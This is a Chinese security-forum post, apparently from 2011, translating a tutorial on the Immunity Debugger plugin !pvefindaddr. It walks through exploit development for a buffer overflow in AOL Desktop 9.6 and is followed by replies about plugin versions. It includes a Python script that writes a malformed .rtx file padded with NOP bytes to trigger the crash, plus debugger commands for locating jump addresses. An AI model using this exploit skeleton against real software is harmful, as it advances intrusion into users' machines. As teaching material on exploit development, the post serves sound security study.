首页
社区
课程
招聘
[翻译]使用!pvefindaddr 更容易的开发漏洞利用
发表于: 2011-3-13 01:05 18771

[翻译]使用!pvefindaddr 更容易的开发漏洞利用

2011-3-13 01:05
18771

翻译题目:使用!pvefindaddr 更容易的开发漏洞利用
        Exploit Writing Made Easier With !pvefindaddr
作者:仙果
版权提示:文章版权归作者所有,转载请注明出处,尊重作者劳动成果。
        题记:看雪上好像没有专门介绍Immunity Debugger 的!pvefindaddr 功能的文章,之前还请教过泉哥,花了一周的空闲时间把文章翻译完,算是补充下。
        最近在fuzzing相关的项目,但是苦于没有经验,进展非常缓慢,求Fuzzing的一些思路,谢谢咯。
        在exploit-db的网站上看到这么一篇文章,使用!pvefindaddr开发exploit,之前使用过这个命令,确实非常有用,今天正好翻译下,共享给更多的朋友,在这里谢谢泉哥之前的帮助。
        现在开始正题,由于英语水平的限制(四级没过),文中肯定有翻译不正确之处,欢迎指正,仙果感激不尽。
        Exploit Writing Made Easier With !pvefindaddr
        开始阅读之前有一些需要注意的地方,包括本文讲到的和未讲到的点。
        1.本文是为了证明!pvefindaddr是有效的。
        2.本文不会完成漏洞的最终利用,如果你需要利用代码,可以在http://www.exploit-db.com/exploits/16107/上下载到。
        现在让我们开始吧。
       
        软件列表:
        Immunity Debugger:http://www.immunityinc.com/products-immdbg.shtml
        !pvefindaddr:        http://redmine.corelan.be:8800/projects/pvefindaddr
        AOL Desktop v9.6:        http://daol.aol.com/software/aoldesktop96/
       
        必备知识:
        理解缓冲区溢出是原理
        漏洞利用技巧
        一门程序开发语言(我选用python)
       
        我听了很多人抱怨漏洞利用过程中必须要使用各种各样的软件,如果这些软件不是自动化的又要花费更多的时间来完成任务或者为了
绕过SAFESEH和ASLR,这就是需要!pvefindaddr出现的地方了。
       
        !pvefindaddr是什么!?
        简短洁说!!pvefindaddr 是由corelanc0d3r:https://twitter.com/#!/corelanc0d3r (需要翻墙)为Immunity Debugger 开发的一个Python命令接口(MS不怎么准确,译者注),其差不多可以做漏洞利用开发过程的所有事情。有一些帮助信息,
如何安装:
!pvefindaddr:http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_install
        例子:http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_usage
       
        OK,让我们真正开始吧
        安装AOL Destop 9.6(应当注意,如果程序无法在Immunity Debugger中正确运行,你必须按住CTRL+ALT+DEL弹出任务管理器-进程,结束掉AOL的相关进程,然后重新执行程序。)
        (准备把AOL Desktop 9.6下载下来自己调试一番,找了半天也没有安装上去,就只翻译,不做本地调试了,也挺郁闷的:译者注)
        我们来完成大概的利用(不会完成整个利用,查看文章开头),包含2个标准头,中间是我们的缓冲区数据,让我们来构造它吧:

****************************************
	#!/usr/bin/python
	# The First Header
	hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
	"\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
	"\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
	"\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
	"\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
	"\x68\x74\x74\x70\x3a\x2f\x2f")
	# The Second Header
	hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
	"\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
	"\x48\x54\x4d\x4c\x3e\x0d\x0a")
	payload='\x90'* 6000
	exploit = hd1+payload+hd2
	try:
	file=open('exploit.rtx','w')
	file.write(exploit)
	file.close()
	print 'File created, time to PEW PEW!\n'
	except:
	print 'Something went wrong!\n'
	print 'Check if you have permisions to write in that folder, of if the folder exists!'
	****************************************
!pvefindaddr suggest
!pvefindaddr j -r ESI -n -o (这会花费一段时间,店小二,来坛烧酒些许花生)

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 7
支持
分享
最新回复 (22)
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
2
发错版块了,真不好意思,版主好心给换个地吧
2011-3-13 01:10
0
雪    币: 678
活跃值: (101)
能力值: ( LV2,RANK:150 )
在线值:
发帖
回帖
粉丝
3
在这里我上传了两份,1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610
2011-3-13 08:57
0
雪    币: 1969
活跃值: (46)
能力值: (RANK:550 )
在线值:
发帖
回帖
粉丝
4
对这块也不懂 学习一下
2011-3-13 09:15
0
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
5
[QUOTE=StudyRush;935423]在这里我上传了两份,1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610[/QUOTE]

把这个忘记了,谢谢共享哈
2011-3-13 15:34
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
6
[QUOTE=StudyRush;935423]在这里我上传了两份,1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610[/QUOTE]

该插件可使用updata参数自动更新
2011-3-13 22:00
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
7
个人感觉该插件在win7下兼容性更好,虚拟机XP下反而会出现问题,一些朋友也遇到过那些问题
2011-3-13 22:05
0
雪    币: 678
活跃值: (101)
能力值: ( LV2,RANK:150 )
在线值:
发帖
回帖
粉丝
8
虽然暂时在实践中使用这个插件,功能确实强大。
2011-3-13 22:34
0
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
9
我在WIN7下无法运行这个插件,虚拟机测试了中文也英文XP SP3 ,效果还可以
2011-3-13 22:35
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
10
这个插件跟ImDebug版本有关
2011-3-14 09:04
0
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
11
那下次的时候我试下最新版在win7下如何,上次是1.7的版本
2011-3-14 09:37
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
12
我用的是旧版的,忘记版本号了,就是之前给你的版本
2011-3-14 10:19
0
雪    币: 33
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
好文章!必须支持
2011-3-14 11:42
0
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
14
那个版本是1.7的版本,win7下不行
  话说为什么没人汉化这个呢?
2011-3-14 11:45
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
15
不是没有,是你没找到,呵呵…
2011-3-14 13:30
0
雪    币: 267
活跃值: (24)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
16
这个插件用过还是不错的,的确可以加快开发速度,
2011-3-14 14:55
0
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
17
汗,接着用英文版吧。。。。
2011-3-14 15:01
0
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
18
时间就是金钱,
2011-3-14 15:02
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
19
我在win7下用的1.5版本的
2011-3-17 21:12
0
雪    币: 1844
活跃值: (35)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
20
上传一份吧,谢
2011-3-17 22:00
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
21
文件比较大,不方便上传,你百度下就有了,之前我是直接用绿色兵团工具包里的IMDBG的,呵呵……
2011-3-18 09:23
0
雪    币: 47147
活跃值: (20450)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
22
辛苦了,感谢仙果的付出!
2011-3-24 21:02
0
雪    币: 204
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
23
非常感谢鸟,最近正在研究,搞得发毛,lz真是帮大忙了
2011-8-31 01:01
0
游客
登录 | 注册 方可回帖
返回
//